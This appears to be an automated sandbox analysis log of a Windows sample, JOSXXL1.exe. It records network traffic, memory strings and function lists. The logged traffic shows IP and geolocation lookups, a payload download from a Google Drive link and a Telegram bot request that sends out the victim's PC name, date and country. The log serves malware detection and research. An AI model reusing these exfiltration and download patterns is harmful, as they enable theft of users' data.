            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:61896 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TQCyESnrOdUT1AguOSyvjh_GMhxmIcz2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1TQCyESnrOdUT1AguOSyvjh_GMhxmIcz2&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:447849%0D%0ADate%20and%20Time:%2027/10/2024%20/%2006:11:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20447849%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 26 Oct 2024 21:57:32 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
            Source: JOSXXL1.exe, 00000004.00000003.2471629134.0000000007036000.00000004.00000020.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000003.2418443538.0000000007036000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://microsoft.coj
            Source: JOSXXL1.exe, 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmp, JOSXXL1.exe, 00000000.00000000.1674444309.000000000040A000.00000008.00000001.01000000.00000003.sdmp, JOSXXL1.exe, 00000004.00000000.2315337300.000000000040A000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: JOSXXL1.exe, 00000004.00000003.2471629134.0000000007036000.00000004.00000020.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000003.2418443538.0000000007036000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
            Source: JOSXXL1.exe, 00000004.00000002.2972706874.0000000038717000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: JOSXXL1.exe, 00000004.00000002.2971397294.0000000037531000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: JOSXXL1.exe, 00000004.00000002.2971397294.0000000037531000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: JOSXXL1.exe, 00000004.00000002.2971397294.0000000037531000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
            Source: JOSXXL1.exe, 00000004.00000002.2971397294.0000000037531000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:447849%0D%0ADate%20a
            Source: JOSXXL1.exe, 00000004.00000003.2418443538.0000000007036000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: JOSXXL1.exe, 00000004.00000002.2972706874.0000000038717000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: JOSXXL1.exe, 00000004.00000002.2972706874.0000000038717000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: JOSXXL1.exe, 00000004.00000002.2972706874.0000000038717000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: JOSXXL1.exe, 00000004.00000002.2971397294.000000003760E000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2971397294.000000003763F000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2971397294.0000000037555000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
            Source: JOSXXL1.exe, 00000004.00000002.2971397294.0000000037609000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlBkq
            Source: JOSXXL1.exe, 00000004.00000002.2943116609.0000000006FC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: JOSXXL1.exe, 00000004.00000002.2943116609.0000000006FC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/a
            Source: JOSXXL1.exe, 00000004.00000002.2943553869.00000000089C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1TQCyESnrOdUT1AguOSyvjh_GMhxmIcz2
            Source: JOSXXL1.exe, 00000004.00000003.2471464803.0000000007070000.00000004.00000020.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2943116609.000000000702F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: JOSXXL1.exe, 00000004.00000003.2471629134.0000000007036000.00000004.00000020.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2943116609.000000000702F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/1
            Source: JOSXXL1.exe, 00000004.00000003.2471629134.0000000007036000.00000004.00000020.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000003.2418443538.0000000007036000.00000004.00000020.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2943116609.000000000701D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1TQCyESnrOdUT1AguOSyvjh_GMhxmIcz2&export=download
            Source: JOSXXL1.exe, 00000004.00000003.2471629134.0000000007036000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1TQCyESnrOdUT1AguOSyvjh_GMhxmIcz2&export=downloads-
            Source: JOSXXL1.exe, 00000004.00000002.2972706874.0000000038717000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: JOSXXL1.exe, 00000004.00000002.2972706874.0000000038717000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: JOSXXL1.exe, 00000004.00000002.2972706874.0000000038717000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: JOSXXL1.exe, 00000004.00000002.2971397294.0000000037531000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2971397294.000000003749B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: JOSXXL1.exe, 00000004.00000002.2971397294.000000003749B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: JOSXXL1.exe, 00000004.00000002.2971397294.000000003749B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.68
            Source: JOSXXL1.exe, 00000004.00000002.2971397294.00000000374C5000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2971397294.000000003750B000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2971397294.0000000037531000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.68$
            Source: JOSXXL1.exe, 00000004.00000003.2418443538.0000000007036000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: JOSXXL1.exe, 00000004.00000002.2972706874.0000000038573000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2972706874.0000000038717000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2972706874.00000000386C9000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2971397294.0000000037555000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2972706874.0000000038525000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2972706874.000000003859A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
            Source: JOSXXL1.exe, 00000004.00000002.2972706874.00000000386CF000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2972706874.0000000038500000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2972706874.00000000387A7000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2972706874.0000000038575000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2972706874.000000003852B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
            Source: JOSXXL1.exe, 00000004.00000002.2972706874.0000000038573000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2972706874.0000000038717000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2972706874.00000000386C9000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2971397294.0000000037555000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2972706874.0000000038525000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2972706874.000000003859A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
            Source: JOSXXL1.exe, 00000004.00000002.2972706874.00000000386CF000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2972706874.0000000038500000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2972706874.00000000387A7000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2972706874.0000000038575000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2972706874.000000003852B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
            Source: JOSXXL1.exe, 00000004.00000002.2972706874.0000000038717000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: JOSXXL1.exe, 00000004.00000003.2418443538.0000000007036000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: JOSXXL1.exe, 00000004.00000003.2418443538.0000000007036000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: JOSXXL1.exe, 00000004.00000002.2972706874.0000000038717000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: JOSXXL1.exe, 00000004.00000003.2418443538.0000000007036000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: JOSXXL1.exe, 00000004.00000003.2418443538.0000000007036000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: JOSXXL1.exe, 00000004.00000002.2971397294.000000003763F000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2971397294.0000000037555000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
            Source: JOSXXL1.exe, 00000004.00000002.2971397294.000000003763A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lBkq
            Source: unknownNetwork traffic detected: HTTP traffic on port 61902 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 61847 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 61933 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 61952 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61964
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61922
            Source: unknownNetwork traffic detected: HTTP traffic on port 61854 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61945
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61902
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61847
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61981
            Source: unknownNetwork traffic detected: HTTP traffic on port 61976 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 61896 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 61913 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61952
            Source: unknownNetwork traffic detected: HTTP traffic on port 61964 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61854
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61976
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61933
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61913
            Source: unknownNetwork traffic detected: HTTP traffic on port 61922 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 61981 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 61945 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61896
            Source: unknownHTTPS traffic detected: 142.250.185.238:443 -> 192.168.2.4:61847 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.4:61854 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:61981 version: TLS 1.2
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 0_2_00405421 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405421
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 0_2_004033B6 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004033B6
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_004033B6 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_004033B6
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 0_2_004068470_2_00406847
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 0_2_00404C5E0_2_00404C5E
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_004068474_2_00406847
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_00404C5E4_2_00404C5E
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_0015C19B4_2_0015C19B
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_0015D2784_2_0015D278
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_001553624_2_00155362
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_0015C4684_2_0015C468
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_0015C7384_2_0015C738
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_0015E9884_2_0015E988
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_001569A04_2_001569A0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_001529E04_2_001529E0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_0015CA084_2_0015CA08
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_0015CCD84_2_0015CCD8
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_00159DE04_2_00159DE0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_0015CFAC4_2_0015CFAC
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_00156FC84_2_00156FC8
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_0015E97C4_2_0015E97C
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_0015F9614_2_0015F961
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_00153E094_2_00153E09
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_396929684_2_39692968
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_396995484_2_39699548
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3969FC684_2_3969FC68
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_396950284_2_39695028
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_396917A04_2_396917A0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_39691E804_2_39691E80
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3969D5404_2_3969D540
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3969D5504_2_3969D550
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3969DDFF4_2_3969DDFF
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3969DDF14_2_3969DDF1
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3969D9A84_2_3969D9A8
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3969D9994_2_3969D999
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_396900404_2_39690040
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3969F8024_2_3969F802
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_396900064_2_39690006
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_39699C184_2_39699C18
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_396950184_2_39695018
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3969F8104_2_3969F810
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3969D0F84_2_3969D0F8
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3969CCA04_2_3969CCA0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3969EF604_2_3969EF60
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3969EF514_2_3969EF51
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_39690B204_2_39690B20
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_39690B304_2_39690B30
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3969EB084_2_3969EB08
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_39698BA04_2_39698BA0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3969F3B84_2_3969F3B8
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3969178F4_2_3969178F
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_39691E704_2_39691E70
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3969E24A4_2_3969E24A
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3969E2584_2_3969E258
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3969DE004_2_3969DE00
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3969EAF84_2_3969EAF8
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3969E6AF4_2_3969E6AF
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3969E6A04_2_3969E6A0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_3969E6B04_2_3969E6B0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_39D781D04_2_39D781D0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_39D78FB04_2_39D78FB0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_39D77B784_2_39D77B78
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_39D760304_2_39D76030
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_39D7E9D84_2_39D7E9D8
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_39D75BD84_2_39D75BD8
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_39D7C9D84_2_39D7C9D8
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_39D7E9C84_2_39D7E9C8
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_39D72FF94_2_39D72FF9
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_39D715F84_2_39D715F8
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_39D7C9E84_2_39D7C9E8
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_39D715E84_2_39D715E8
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_39D7D7984_2_39D7D798
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_39D7B7984_2_39D7B798
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_39D7D7874_2_39D7D787
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_39D757804_2_39D75780
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_39D7F7884_2_39D7F788
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_39D72BB04_2_39D72BB0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_39D78FA14_2_39D78FA1
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_39D711A04_2_39D711A0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_39D72BA04_2_39D72BA0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_39D72BAF4_2_39D72BAF
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_39D781AA4_2_39D781AA
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_39D7B7A84_2_39D7B7A8
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_39D7C5584_2_39D7C558
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_39D727584_2_39D72758
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_39D727494_2_39D72749
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_39D70D484_2_39D70D48
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_39D7E5484_2_39D7E548
